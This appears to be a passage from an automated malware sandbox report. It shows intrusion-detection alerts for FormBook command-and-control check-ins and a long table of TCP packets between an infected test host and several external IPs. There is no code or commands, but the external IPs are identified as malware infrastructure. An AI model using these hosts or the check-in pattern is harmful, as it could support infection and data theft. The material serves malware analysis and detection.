                                                                                                                                                                              2024-10-30T08:13:30.545952+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005434.92.128.5980TCP
                                                                                                                                                                              2024-10-30T08:13:33.174085+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45005534.92.128.5980TCP
                                                                                                                                                                              2024-10-30T08:13:33.174085+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45005534.92.128.5980TCP
                                                                                                                                                                              2024-10-30T08:13:39.287979+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450056152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:41.851526+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450057152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:44.467456+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450058152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:46.940067+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450059152.42.255.4880TCP
                                                                                                                                                                              2024-10-30T08:13:46.940067+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450059152.42.255.4880TCP

                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                              TCP Packets

                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                              Oct 30, 2024 08:10:32.310398102 CET4974180192.168.2.43.33.130.190
                                                                                                                                                                              Oct 30, 2024 08:10:32.315717936 CET80497413.33.130.190192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:32.315833092 CET4974180192.168.2.43.33.130.190
                                                                                                                                                                              Oct 30, 2024 08:10:32.326267004 CET4974180192.168.2.43.33.130.190
                                                                                                                                                                              Oct 30, 2024 08:10:32.331648111 CET80497413.33.130.190192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:32.953885078 CET80497413.33.130.190192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:32.954798937 CET80497413.33.130.190192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:32.954879999 CET4974180192.168.2.43.33.130.190
                                                                                                                                                                              Oct 30, 2024 08:10:32.957438946 CET4974180192.168.2.43.33.130.190
                                                                                                                                                                              Oct 30, 2024 08:10:32.962750912 CET80497413.33.130.190192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:49.030477047 CET4979480192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:49.035829067 CET8049794103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:49.035907984 CET4979480192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:49.047422886 CET4979480192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:49.052825928 CET8049794103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:50.202378035 CET8049794103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:50.202497959 CET4979480192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:50.549669027 CET4979480192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:50.554943085 CET8049794103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:51.581994057 CET4981080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:51.587523937 CET8049810103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:51.587609053 CET4981080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:51.605058908 CET4981080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:51.610457897 CET8049810103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:52.752604961 CET8049810103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:52.752803087 CET4981080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:53.112430096 CET4981080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:53.117652893 CET8049810103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.133492947 CET4982680192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:54.138966084 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.139123917 CET4982680192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:54.154606104 CET4982680192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:54.160130978 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160149097 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160201073 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160213947 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160253048 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160264969 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160360098 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160372972 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:54.160403967 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:55.113492966 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:55.113557100 CET4982680192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:55.659174919 CET4982680192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:55.664477110 CET8049826103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:56.678441048 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:56.684300900 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:56.684453964 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:56.692476034 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:56.699388981 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668732882 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668751001 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668764114 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668864012 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668868065 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:57.668876886 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668939114 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668945074 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.668992043 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:57.668992043 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:57.862117052 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:10:57.862298965 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:57.863838911 CET4984080192.168.2.4103.120.80.111
                                                                                                                                                                              Oct 30, 2024 08:10:57.869132996 CET8049840103.120.80.111192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:02.904867887 CET4987680192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:02.910276890 CET8049876217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:02.910348892 CET4987680192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:02.927584887 CET4987680192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:02.932883978 CET8049876217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:03.747900963 CET8049876217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:03.747917891 CET8049876217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:03.748001099 CET4987680192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:03.871401072 CET8049876217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:03.871520042 CET4987680192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:04.440347910 CET4987680192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:05.459481955 CET4989080192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:05.464983940 CET8049890217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:05.465076923 CET4989080192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:05.476934910 CET4989080192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:05.482328892 CET8049890217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:06.297595978 CET8049890217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:06.297638893 CET8049890217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:06.297813892 CET4989080192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:06.420607090 CET8049890217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:06.420701027 CET4989080192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:06.987294912 CET4989080192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:08.007095098 CET4990480192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:08.017343044 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.017466068 CET4990480192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:08.028850079 CET4990480192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:08.038651943 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038664103 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038674116 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038682938 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038692951 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038796902 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038806915 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038815022 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.038827896 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.869854927 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.869898081 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.869961023 CET4990480192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:08.992746115 CET8049904217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:08.992871046 CET4990480192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:09.537781000 CET4990480192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:10.553096056 CET4991880192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:10.558636904 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:10.558773041 CET4991880192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:10.566611052 CET4991880192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:10.572115898 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:11.413075924 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:11.413149118 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:11.413183928 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:11.413201094 CET4991880192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:11.413218975 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:11.413311958 CET4991880192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:11.540968895 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:11.541182995 CET4991880192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:11.542059898 CET4991880192.168.2.4217.160.0.60
                                                                                                                                                                              Oct 30, 2024 08:11:11.547333002 CET8049918217.160.0.60192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:16.604278088 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:16.609766006 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:16.609873056 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:16.620498896 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:16.625866890 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:17.480217934 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:17.480247021 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:17.480354071 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:17.623301029 CET8049954161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:17.623362064 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:18.144011974 CET4995480192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.162092924 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.167602062 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:19.167731047 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.179251909 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:19.184751034 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.001339912 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.001355886 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.001401901 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:20.122385025 CET8049969161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:20.122467995 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:20.690222979 CET4996980192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.708995104 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.714390993 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.714509010 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.725886106 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:21.731362104 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731375933 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731386900 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731395960 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731432915 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731442928 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731596947 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731607914 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:21.731617928 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.550036907 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.550060034 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.550127029 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:22.671957970 CET8049985161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:22.672038078 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:23.237129927 CET4998580192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.287388086 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.292695045 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:24.292819977 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.304682970 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:24.310013056 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122616053 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122648954 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122663021 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122698069 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.122859001 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:25.244554996 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:25.244746923 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:25.245599985 CET5000080192.168.2.4161.97.142.144
                                                                                                                                                                              Oct 30, 2024 08:11:25.250905037 CET8050000161.97.142.144192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.283425093 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:30.288718939 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.288794041 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:30.302237034 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:30.307531118 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.980334044 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:30.980429888 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:31.815344095 CET5002080192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:31.820709944 CET805002013.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:32.836324930 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:32.841784954 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:32.841861963 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:32.933159113 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:32.938570976 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:33.545315981 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:33.545455933 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:34.440257072 CET5002180192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:34.445739031 CET805002113.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.459747076 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:35.516447067 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.516539097 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:35.528155088 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:35.533658981 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533670902 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533710003 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533720970 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533744097 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533755064 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533767939 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533797979 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:35.533808947 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:36.187227011 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:36.187303066 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:37.033948898 CET5002280192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:37.039356947 CET805002213.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.053756952 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.059263945 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.059369087 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.066788912 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.072212934 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.719858885 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.753062010 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:38.753226995 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.815401077 CET5002380192.168.2.413.248.169.48
                                                                                                                                                                              Oct 30, 2024 08:11:38.821244955 CET805002313.248.169.48192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:43.864777088 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:43.870285034 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:43.870352030 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:43.883404016 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:43.888942003 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:44.784115076 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:44.898287058 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:44.945344925 CET8050024198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:44.950680017 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:45.394967079 CET5002480192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.412173986 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.419262886 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:46.419435978 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.430624962 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:46.435978889 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:47.336349010 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:47.490412951 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:47.492708921 CET8050025198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:47.492764950 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:47.940228939 CET5002580192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:48.958935976 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:48.964378119 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.964499950 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:48.974736929 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:48.980165005 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980182886 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980209112 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980221033 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980320930 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980333090 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980348110 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980370045 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:48.980427980 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:49.870584965 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:49.932894945 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:50.027395010 CET8050026198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:50.027467966 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:50.488102913 CET5002680192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:51.507236004 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:51.512681007 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:51.512758970 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:51.522372961 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:51.527683973 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:52.442900896 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:52.581486940 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:52.599185944 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:52.599347115 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:52.602173090 CET5002780192.168.2.4198.251.84.200
                                                                                                                                                                              Oct 30, 2024 08:11:52.607562065 CET8050027198.251.84.200192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:57.637255907 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:11:57.642735958 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:57.642802000 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:11:57.656569958 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:11:57.662087917 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:58.332462072 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:58.333605051 CET8050028172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:11:58.333652020 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:11:59.160088062 CET5002880192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:00.178853035 CET5002980192.168.2.4172.67.154.67
                                                                                                                                                                              Oct 30, 2024 08:12:00.184309959 CET8050029172.67.154.67192.168.2.4
                                                                                                                                                                              Oct 30, 2024 08:12:00.184396029 CET5002980192.168.2.4172.67.154.67
